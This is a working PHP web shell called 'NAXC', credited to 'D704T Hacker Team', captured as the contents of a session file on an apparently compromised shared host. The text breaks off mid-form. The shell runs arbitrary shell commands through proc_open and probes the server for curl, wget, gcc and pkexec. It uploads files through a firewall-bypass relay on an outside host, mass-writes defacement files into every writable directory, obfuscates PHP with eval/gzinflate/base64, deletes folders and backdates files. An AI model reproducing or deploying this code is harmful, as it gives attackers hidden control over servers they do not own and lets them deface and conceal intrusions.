芝麻web文件管理V1.00

编辑当前文件:/home/felaukpo/.cagefs/tmp/sess_5171fcbf42bcab65758aae7e9218e28b.php
<?php session_start(); ob_start(); date_default_timezone_set('Asia/Jakarta'); $path = (isset($_GET["path"])) ? $_GET["path"] : getcwd(); $file = (isset($_GET["file"])) ? $_GET["file"] : ""; $page = isset($_GET['page']) ? max(1, intval($_GET['page'])) : 1; $toPage = (isset($_GET['page']) ? '&page=' . intval($_GET['page']) : ''); $search = isset($_GET['search']) ? strtolower(trim($_GET['search'])) : ''; $web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST']; $os = php_uname('s'); $separator = ($os === 'Windows') ? "\\" : "/"; $explode = explode($separator, $path); if (!function_exists("execute")) { function execute($cmd, $location) { $ler = "2>&1"; if (!preg_match("/" . $ler . "/i", $cmd)) { $cmd = $cmd . " " . $ler; } $komen = $cmd; $pr = "proc_open"; if (function_exists($pr)) { $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $location); return true; } else { return false; } } } function ipserv() { if (empty($_SERVER['SERVER_ADDR'])) { return gethostbyname($_SERVER['SERVER_NAME']); if (empty(gethostbyname($_SERVER['SERVER_NAME']))) { return $_SERVER['SERVER_NAME']; } } else { return $_SERVER['SERVER_ADDR']; } } function deleteFolder($dir) { if (!is_dir($dir)) { return false; } // Scan all files and folders inside $items = array_diff(scandir($dir), ['.', '..']); foreach ($items as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteFolder($path); // recursive delete } else { unlink($path); // delete file } } return rmdir($dir); // finally remove the folder itself } function requests($url, $post = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); if ($post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); $error = curl_error($ch); curl_close($ch); if ($error) { return false; } return $response; } function ggr($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "si" . "x_ge" . "tgr" . "gid"; $c = "fi" . "le" . "gro" . "up"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b(@$c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d['name']; } } elseif ($a($c)) { return @$c($fl); } else { return "?"; } } function gor($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "s" . "ix_" . "get" . "pwu" . "id"; $c = "fi" . "le" . "o" . "wn" . "er"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b(@$c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d['name']; } } elseif ($a($c)) { return @$c($fl); } else { return "?"; } } function file_editor($path, $file, $content, $method) { $fileloc = $path . "/" . $file; $renamed = str_replace(".temporary", "", $file); unlink($path . "/" . $file); touch($fileloc); if ($method === 'basic') { if (error_log($content, 3, $fileloc)) { rename($fileloc, $path . "/" . $renamed); return true; } } else { if (execute("echo " . base64_encode($content) . " | base64 -d > '$renamed'", $path)) { return true; } } return false; } function sabun_biasa($location, $filename, $content) { if (is_writable($location)) { $dira = scandir($location); foreach ($dira as $dirb) { $dirc = "$location/$dirb"; $lokasi = $dirc . '/' . $filename; if ($dirb === '.') { file_put_contents($lokasi, $content); } elseif ($dirb === '..') { continue; } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo " http://$dirb/$filename<br>"; file_put_contents($lokasi, $content); } } } } } } function sabun_massal($serlok, $namafile, $isi_script) { if (is_writable($serlok)) { $dira = scandir($serlok); foreach ($dira as $dirb) { $dirc = "$serlok/$dirb"; $lokasi = $dirc . '/' . $namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { continue; } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $serlok<br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } function php_obfuscator(string $code): string { if (preg_match('/^\s*<\?=\s*/i', $code)) { $code = preg_replace('/^\s*<\?=\s*/i', '<?php ', $code); } $code = preg_replace('/^\s*<\?(php)?|\?>\s*$/i', '', $code); $encoded = base64_encode(gzdeflate($code, 9)); $obfuscated = ''; for ($i = 0, $l = strlen($encoded); $i < $l; $i++) { if (rand(0, 3) === 0) { $obfuscated .= '\\x' . dechex(ord($encoded[$i])); } else { $obfuscated .= $encoded[$i]; } } $var = '$naxc' . substr(str_shuffle('abcdefghijklmnopqrstuvwxyz'), 0, 8); return <<<PHP $var = "$obfuscated"; eval(gzinflate(base64_decode($var))); exit; PHP; } function filedate($file) { return @date("F d Y g:i:s", @filemtime($file)); } function chdate($itemPath, $newDate) { $timestamp = strtotime($newDate); if ($timestamp === false || !touch($itemPath, $timestamp)) { return false; } return true; } function isZip($file) { $zipSignature = "\x50\x4B\x03\x04"; $handle = fopen($file, 'rb'); if ($handle) { $fileSignature = fread($handle, 4); fclose($handle); return $fileSignature === $zipSignature; } return false; } function flash($type, $msg, $refreshTo = null, $goto = null) { global $path, $toPage; $refreshTo = (is_null($refreshTo)) ? $path . $toPage : $refreshTo; $_SESSION["$type"] = "$msg"; if ($goto) { $_SESSION["goto"] = [ "location" => "$goto", "text" => "VIEW" ]; } header("Refresh:0; url=?path=" . $refreshTo); exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="author" content="D704T Hacker Team"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow" /> <meta name="googlebot" content="noindex"> <title>~NAXC~</title> <script src="https://cdn.tailwindcss.com"></script> <script> tailwind.config = { darkMode: 'class' } </script> <script> if (localStorage.getItem('color-theme') === 'dark' || (!('color-theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches)) { document.documentElement.classList.add('dark'); } else { document.documentElement.classList.remove('dark'); } </script> </head> <body class="bg-indigo-50 dark:bg-gray-900 text-gray-800 dark:text-gray-200"> <?php if (isset($_SESSION["success"])) { ?> <div id="toast-default" class="fixed top-0 right-0 z-10 w-full max-w-xs p-4 text-gray-500 bg-white rounded-lg shadow-sm dark:text-gray-400 dark:bg-gray-800" role="alert"> <div class="flex items-center"> <div class="inline-flex items-center justify-center shrink-0 w-8 h-8 text-green-500 bg-green-100 rounded-lg dark:bg-green-300 dark:text-green-200"> <svg class="w-6 h-6 text-green-600 dark:text-green-700" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm13.707-1.293a1 1 0 0 0-1.414-1.414L11 12.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.414 0l4-4Z" clip-rule="evenodd" /> </svg> </div> <div class="ms-3 text-sm font-normal"><?= $_SESSION["success"]; ?></div> <button type="button" class="ms-auto -mx-1.5 -my-1.5 bg-white text-gray-400 hover:text-gray-900 rounded-lg focus:ring-2 focus:ring-gray-300 p-1.5 hover:bg-gray-100 inline-flex items-center justify-center h-8 w-8 dark:text-gray-500 dark:hover:text-white dark:bg-gray-800 dark:hover:bg-gray-700" data-dismiss-target="#toast-default" aria-label="Close"> <span class="sr-only">Close</span> <svg class="w-3 h-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 14"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="m1 1 6 6m0 0 6 6M7 7l6-6M7 7l-6 6" /> </svg> </button> </div> <?php if (isset($_SESSION["goto"])): ?> <div class="mt-3 text-center"> <a class="inline-block text-blue-700 hover:text-white border border-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg px-3 py-2 text-xs dark:border-blue-500 dark:text-blue-500 dark:hover:text-white dark:hover:bg-blue-500 dark:focus:ring-blue-800" href="<?= ($_SESSION["goto"]["location"]); ?>"> <?= ($_SESSION["goto"]["text"]); ?> </a> </div> <?php endif; unset($_SESSION["goto"]); ?> </div> <?php unset($_SESSION["success"]); } if (isset($_SESSION["error"])) { ?> <div id="toast-default" class="fixed top-0 right-0 z-10 flex items-center w-full max-w-xs p-4 text-gray-500 bg-white rounded-lg shadow-sm dark:text-gray-400 dark:bg-gray-800" role="alert"> <div class="inline-flex items-center justify-center shrink-0 w-8 h-8 text-red-500 bg-red-100 rounded-lg dark:bg-red-300 dark:text-red-200"> <svg class="w-6 h-6 text-red-800 dark:text-red-700" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm7.707-3.707a1 1 0 0 0-1.414 1.414L10.586 12l-2.293 2.293a1 1 0 1 0 1.414 1.414L12 13.414l2.293 2.293a1 1 0 0 0 1.414-1.414L13.414 12l2.293-2.293a1 1 0 0 0-1.414-1.414L12 10.586 9.707 8.293Z" clip-rule="evenodd" /> </svg> </div> <div class="ms-3 text-sm font-normal"><?= $_SESSION["error"]; ?></div> <button type="button" class="ms-auto -mx-1.5 -my-1.5 bg-white text-gray-400 hover:text-gray-900 rounded-lg focus:ring-2 focus:ring-gray-300 p-1.5 hover:bg-gray-100 inline-flex items-center justify-center h-8 w-8 dark:text-gray-500 dark:hover:text-white dark:bg-gray-800 dark:hover:bg-gray-700" data-dismiss-target="#toast-default" aria-label="Close"> <span class="sr-only">Close</span> <svg class="w-3 h-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 14"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="m1 1 6 6m0 0 6 6M7 7l6-6M7 7l-6 6" /> </svg> </button> </div> <?php unset($_SESSION["success"]); } ?> <!-- Main modal --> <div id="authentication-modal" tabindex="-1" aria-hidden="true" class="hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 justify-center items-center w-full md:inset-0 h-[calc(100%-1rem)] max-h-full"> <div class="relative p-4 w-full max-w-md max-h-full"> <!-- Modal content --> <div class="relative bg-white rounded-lg shadow-sm dark:bg-gray-700"> <!-- Modal body --> <div class="p-4 md:p-5"> <form method="get" class="max-w-md mx-auto"> <input type="hidden" name="path" value="<?= htmlspecialchars($path) ?>"> <label for="default-search" class="mb-2 text-sm font-medium text-gray-900 sr-only dark:text-white">Search</label> <div class="relative"> <div class="absolute inset-y-0 start-0 flex items-center ps-3 pointer-events-none"> <svg class="w-4 h-4 text-gray-500 dark:text-gray-400" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 20 20"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="m19 19-4-4m0-7A7 7 0 1 1 1 8a7 7 0 0 1 14 0Z" /> </svg> </div> <input type="search" id="default-search" name="search" class="block w-full p-4 ps-10 text-sm text-gray-900 border border-gray-300 rounded-lg bg-gray-50 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="Search files or folders..." value="<?= htmlspecialchars(isset($_GET['search']) ? $_GET['search'] : '') ?>" autofocus> <button type="submit" class="text-white absolute end-2.5 bottom-2.5 bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-4 py-2 dark:bg-blue-600 dark:hover:bg-blue-700 dark:focus:ring-blue-800"> Search </button> </div> </form> </div> </div> </div> </div> <div class="container mx-auto p-4"> <div data-dial-init class="fixed bottom-5 right-5 z-10 group"> <div id="speed-dial-menu-default" class="flex flex-col items-center hidden mb-4 space-y-2"> <button type="button" data-modal-target="authentication-modal" data-modal-toggle="authentication-modal" data-tooltip-target="tooltip-search" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 shadow-xs dark:hover:text-white dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-width="2" d="m21 21-3.5-3.5M17 10a7 7 0 1 1-14 0 7 7 0 0 1 14 0Z" /> </svg> <span class="sr-only">Search</span> </button> <div id="tooltip-search" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700"> Search <div class="tooltip-arrow" data-popper-arrow></div> </div> <a href="?path=<?= $path; ?>&action=infomin<?= $toPage ?>" data-tooltip-target="tooltip-information" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 dark:hover:text-white shadow-xs dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm9.408-5.5a1 1 0 1 0 0 2h.01a1 1 0 1 0 0-2h-.01ZM10 10a1 1 0 1 0 0 2h1v3h-1a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-1v-4a1 1 0 0 0-1-1h-2Z" clip-rule="evenodd" /> </svg> <span class="sr-only">Information</span> </a> <div id="tooltip-information" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700"> Information <div class="tooltip-arrow" data-popper-arrow></div> </div> <button type="button" id="theme-toggle" data-tooltip-target="tooltip-mode" data-tooltip-placement="left" class="flex justify-center items-center w-[52px] h-[52px] text-gray-500 hover:text-gray-900 bg-white rounded-full border border-gray-200 dark:border-gray-600 shadow-xs dark:hover:text-white dark:text-gray-400 hover:bg-gray-50 dark:bg-gray-700 dark:hover:bg-gray-600 focus:ring-4 focus:ring-gray-300 focus:outline-none dark:focus:ring-gray-400"> <svg id="theme-toggle-light-icon" class="hidden w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M13 3a1 1 0 1 0-2 0v2a1 1 0 1 0 2 0V3ZM6.343 4.929A1 1 0 0 0 4.93 6.343l1.414 1.414a1 1 0 0 0 1.414-1.414L6.343 4.929Zm12.728 1.414a1 1 0 0 0-1.414-1.414l-1.414 1.414a1 1 0 0 0 1.414 1.414l1.414-1.414ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Zm-9 4a1 1 0 1 0 0 2h2a1 1 0 1 0 0-2H3Zm16 0a1 1 0 1 0 0 2h2a1 1 0 1 0 0-2h-2ZM7.757 17.657a1 1 0 1 0-1.414-1.414l-1.414 1.414a1 1 0 1 0 1.414 1.414l1.414-1.414Zm9.9-1.414a1 1 0 0 0-1.414 1.414l1.414 1.414a1 1 0 0 0 1.414-1.414l-1.414-1.414ZM13 19a1 1 0 1 0-2 0v2a1 1 0 1 0 2 0v-2Z" clip-rule="evenodd" /> </svg> <svg id="theme-toggle-dark-icon" class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M11.675 2.015a.998.998 0 0 0-.403.011C6.09 2.4 2 6.722 2 12c0 5.523 4.477 10 10 10 4.356 0 8.058-2.784 9.43-6.667a1 1 0 0 0-1.02-1.33c-.08.006-.105.005-.127.005h-.001l-.028-.002A5.227 5.227 0 0 0 20 14a8 8 0 0 1-8-8c0-.952.121-1.752.404-2.558a.996.996 0 0 0 .096-.428V3a1 1 0 0 0-.825-.985Z" clip-rule="evenodd" /> </svg> </button> <div id="tooltip-mode" role="tooltip" class="absolute z-10 invisible inline-block w-auto px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700"> <span id="light-text" class="hidden">Light</span> <span id="dark-text">Dark</span> <div class="tooltip-arrow" data-popper-arrow></div> </div> </div> <button type="button" data-dial-toggle="speed-dial-menu-default" aria-controls="speed-dial-menu-default" aria-expanded="false" class="flex items-center justify-center text-white bg-blue-700 rounded-full w-[52px] h-[52px] hover:bg-blue-800 dark:bg-blue-600 dark:hover:bg-blue-700 focus:ring-4 focus:ring-blue-300 focus:outline-none dark:focus:ring-blue-800"> <svg class="w-5 h-5 transition-transform group-hover:rotate-45" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 18 18"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 1v16M1 9h16" /> </svg> <span class="sr-only">Open actions menu</span> </button> </div> <div class="flex content-center items-center flex-col md:flex-row"> <a href="<?php echo basename($_SERVER['PHP_SELF']); ?>"><img src="https://fcalpha.net/web/photo/20151024/300px-D704T.jpg" class="h-[150px] rounded-full w-auto mt-2"></a> <form class="min-[460px]:flex-row md:ms-auto max-w-xl mt-4" method="post" enctype="multipart/form-data"> <div class="flex content-center flex-col gap-2 mb-4"> <input class="file:cursor-pointer dark:file:bg-gray-600 file:h-full file:px-4 file:py-2 file:mr-4 file:border-none dark:file:text-gray-300 file:hover:opacity-75 text-sm block w-full text-sm text-gray-900 border border-gray-300 rounded-lg cursor-pointer bg-gray-50 dark:text-gray-400 focus:outline-none dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400" type="file" name="nax[]" multiple> <select id="upmethod" name="upmethod" class="block w-full py-[9px] px-2 text-sm text-gray-900 border border-gray-300 rounded-lg bg-gray-50 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required> <option value="basic_upload" selected>Basic upload method</option> <option value="bypass_upload">Bypass upload method</option> </select> </div> <div class="flex flex-row items-center justify-between gap-2"> <div> <button data-tooltip-target="tooltip-animation" type="button" class="flex gap-1 items-center text-blue-800 text-sm text-center dark:text-blue-400"> <svg class="w-6 h-6 text-blue-800 dark:text-blue-400" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M2 12C2 6.477 6.477 2 12 2s10 4.477 10 10-4.477 10-10 10S2 17.523 2 12Zm9.408-5.5a1 1 0 1 0 0 2h.01a1 1 0 1 0 0-2h-.01ZM10 10a1 1 0 1 0 0 2h1v3h-1a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-1v-4a1 1 0 0 0-1-1h-2Z" clip-rule="evenodd" /> </svg><span>Tips!</span> </button> <div id="tooltip-animation" role="tooltip" class="absolute z-10 invisible inline-block px-3 py-2 text-sm font-medium text-white transition-opacity duration-300 bg-gray-900 rounded-lg shadow-xs opacity-0 tooltip dark:bg-gray-700"> If you encounter an error (by firewall) while uploading using both methods,<br>try changing extension of the file before uploading it and rename it right after.<br><br><span class="italic text-sm">This uploader supports multiple file upload.<span> <div class="tooltip-arrow" data-popper-arrow></div> </div> </div> <div> <button class="block px-3 py-2 text-sm font-medium text-center text-white bg-blue-700 rounded-lg hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 dark:bg-blue-600 dark:hover:bg-blue-700 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="upload"> Submit </button> </div> </div> </form> <?php if (isset($_POST["upload"])) { $total_files = count($_FILES["nax"]["name"]) - 1; foreach ($_FILES["nax"]["name"] as $key => $value) { $filename = basename($_FILES["nax"]["name"][$key]); $tempname = $_FILES["nax"]["tmp_name"][$key]; $upmethod = $_POST["upmethod"]; if ($upmethod === "basic_upload") { $dest = $path . "/" . $filename; $target = rtrim($path, '/\\') . '/' . basename($_FILES['nax']['name'][$key]); if (touch($dest) && @move_uploaded_file($_FILES['nax']['tmp_name'][$key], $target)) { if ($key == $total_files) { flash("success", ($total_files + 1) . " File(s) uploaded successfully!", $path . $toPage); } } else { flash("error", "Upload failed!", $path . $toPage); } } else { $remote_upload_url = "https://fcalpha.net/web/photo/20151024/temp/upload.php"; $postfields = ["nax" => new CURLFile($tempname, $_FILES["nax"]["type"][$key], $filename)]; $remote_upload = requests($remote_upload_url, $postfields); if ($remote_upload) { $uniqFile = json_decode($remote_upload, true)["file"]; $remote_url = "https://fcalpha.net/web/photo/20151024/temp/uploads/" . $uniqFile; if (requests($remote_url, null, $path . "/" . $filename) && file_exists($path . "/" . $filename) && filesize($path . "/" . $filename) > 0) { if ($key == $total_files) { flash("success", ($total_files + 1) . " File(s) uploaded successfully!", $path . $toPage); } } else { $file_content = base64_encode(requests($remote_url)); if (execute('echo "' . $file_content . '" | base64 -d > ' . $filename, $path)) { if ($key == $total_files) { flash("success", ($total_files + 1) . " File(s) uploaded successfully!", $path . $toPage); } } } } else { flash("error", "Upload failed!", $path . $toPage); } $delete_file = "https://fcalpha.net/web/photo/20151024/temp/delete.php"; requests($delete_file, [ "file" => $uniqFile ]); } } } ?> </div> <!-- Breadcrumb for change dir --> <nav class="flex p-4 my-10 overflow-auto text-gray-700 rounded-lg bg-gray-50 shadow-md dark:bg-gray-700" aria-label="Breadcrumb"> <ol class="inline-flex items-center space-x-1 md:space-x-2 rtl:space-x-reverse"> <?php if (isset($_GET["file"]) && !isset($_GET["path"])) { $path = dirname($_GET["file"]); } $path = str_replace("\\", "/", $path); $paths = explode("/", $path); echo (!preg_match("/Windows/", $os)) ? "<li class='inline-flex items-center'><a class='text-gray-500 dark:text-gray-400 hover:text-gray-600 dark:hover:text-gray-500' id='dir' href='?path=/'><strong>~</strong></a></li>" : ""; $icon = "<svg class='w-6 h-6 text-gray-400 rtl:rotate-180' fill='currentColor' viewBox='0 0 20 20' xmlns='http://www.w3.org/2000/svg'><path fill-rule='evenodd' d='M7.293 14.707a1 1 0 010-1.414L10.586 10 7.293 6.707a1 1 0 011.414-1.414l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414 0z' clip-rule='evenodd'></path></svg>"; foreach ($paths as $id => $pat) { if ($pat === "") { continue; } echo "<li class='inline-flex items-center'> " . (($id != 0) ? $icon : '') . " <a class='ml-1 md:ml-2 text-gray-500 dark:text-gray-400 hover:text-gray-600 dark:hover:text-gray-500' href='?path="; for ($i = 0; $i <= $id; $i++) { echo $paths[$i]; if ($i != $id) { echo "/"; } } echo "'><strong>$pat</strong></a></li>"; } ?> </ol> </nav> <?php if (isset($_GET["action"]) && $_GET["action"] === "infomin") { $curl = (!preg_match('/not recognized|command not found/i', execute('curl --version', $path))) ? 'CURL (YES), ' : 'CURL (NO), '; $wget = (!preg_match('/not recognized|command not found/i', execute('wget --help', $path))) ? 'WGET (YES), ' : 'WGET (NO), '; $python = (!preg_match('/not recognized|command not found/i', execute('python --version', $path)) || !preg_match('/not recognized|command not found/i', execute('python3 --version', $path))) ? 'PYTHON (YES), ' : 'PYTHON (NO), '; $perl = (!preg_match('/not recognized|command not found/i', execute('perl --help', $path))) ? 'PERL (YES), ' : 'PERL (NO), '; $gcc = (!preg_match('/not recognized|command not found/i', execute('gcc --help', $path))) ? 'GCC (YES), ' : 'GCC (NO), '; $ruby = (!preg_match('/not recognized|command not found/i', execute('ruby --help', $path))) ? 'RUBY (YES), ' : 'RUBY (NO), '; $pkexec = (!preg_match('/not recognized|command not found/i', execute('pkexec --version', $path))) ? 'PKEXEC (YES), ' : 'PKEXEC (NO), '; ?> <div class="bg-gray-50 shadow-md dark:bg-gray-700 p-4 rounded-lg"> <h2 class="text-lg font-semibold mb-2">System Information</h2> <ul class="list-disc list-inside overflow-auto"> <li><strong>Server IP:</strong> <?= ipserv(); ?></li> <li><strong>Server Software:</strong> <?= ($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'N/A'; ?></li> <li><strong>PHP Version:</strong> <?= phpversion(); ?></li> <li><strong>Current User:</strong> <?= get_current_user(); ?></li> <li><strong>Operating System:</strong> <?= php_uname(); ?></li> <li><strong>Document Root:</strong> <?= ($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : 'N/A'; ?></li> <li><strong>Server Port:</strong> <?= ($_SERVER['SERVER_PORT']) ? $_SERVER['SERVER_PORT'] : 'N/A'; ?></li> <li><strong>Server Admin:</strong> <?= ($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : 'N/A'; ?></li> <li><strong>Command Line:</strong> <?= $curl . $wget . $python . $perl . $ruby . $gcc . $pkexec; ?></li> <li><strong>Loaded PHP Modules:</strong> <?= implode(", ", get_loaded_extensions()); ?></li> </ul> </div> <?php } /* TOOLS */ if (isset($_GET["action"]) && $_GET["action"] === "command") { ?> <form method="post" action=""> <div class='mt-4'> <label for="coman" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">Command:</label> <input type="text" id="coman" name="coman" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?php echo (isset($_POST["coman"])) ? htmlspecialchars($_POST["coman"]) : ""; ?>" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="execute"> Execute </button> </div> </form> <?php if (isset($_POST["execute"])) { $coman = $_POST["coman"]; if (empty($coman)) { echo "<font color='red'>Command is empty</font>"; } else { echo "<font color='green'>Command: " . htmlspecialchars($coman) . "</font><br>"; $ler = "2>&1"; if (!preg_match("/" . $ler . "/i", $coman)) { $coman = $coman . " " . $ler; } $komen = $coman; $pr = "proc_open"; if (function_exists($pr)) { $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $path); echo "<pre><textarea rows='25' style='color:lime;' readonly='' class=' block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500'> " . htmlspecialchars(stream_get_contents($crottz[1])) . "</textarea></pre><br>"; } else { echo "<font color='orange'>proc_open function is disabled!!</font>"; } } } } if (isset($_GET["action"]) && $_GET["action"] === "massdeface") { if (isset($_POST["massdeface"])) { if ($_POST['mass_type'] == 'mahal') { echo '<div class="block p-2.5 w-full max-h-[300px] overflow-y-auto text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none" readonly>'; sabun_massal($path, $_POST['file_name'], $_POST['file_content']); echo "</div>"; } elseif ($_POST['mass_type'] == 'murah') { echo '<div class="block p-2.5 w-full max-h-[300px] overflow-y-auto text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none" readonly>'; sabun_biasa($path, $_POST['file_name'], $_POST['file_content']); echo "</div>"; } } else { ?> <form action="" method="post"> <ul class="grid w-full gap-6 md:grid-cols-2 mb-4"> <li> <input type="radio" id="mass-def-1" name="mass_type" value="murah" class="hidden peer" required checked /> <label for="mass-def-1" class="inline-flex items-center justify-between w-full p-5 text-gray-500 bg-white border border-gray-200 rounded-lg cursor-pointer dark:hover:text-gray-300 dark:border-gray-700 dark:peer-checked:text-blue-500 peer-checked:border-blue-600 dark:peer-checked:border-blue-600 peer-checked:text-blue-600 hover:text-gray-600 hover:bg-gray-100 dark:text-gray-400 dark:bg-gray-800 dark:hover:bg-gray-700"> <div class="block"> <div class="w-full text-lg font-semibold">BASIC</div> <div class="w-full">Mass upload to currently shown folders</div> </div> <svg class="w-5 h-5 ms-3 rtl:rotate-180" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 10"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 5h12m0 0L9 1m4 4L9 9" /> </svg> </label> </li> <li> 